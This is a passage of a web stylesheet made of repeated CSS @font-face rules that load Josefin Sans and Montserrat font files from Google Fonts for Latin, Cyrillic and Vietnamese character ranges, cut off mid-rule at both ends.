url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: 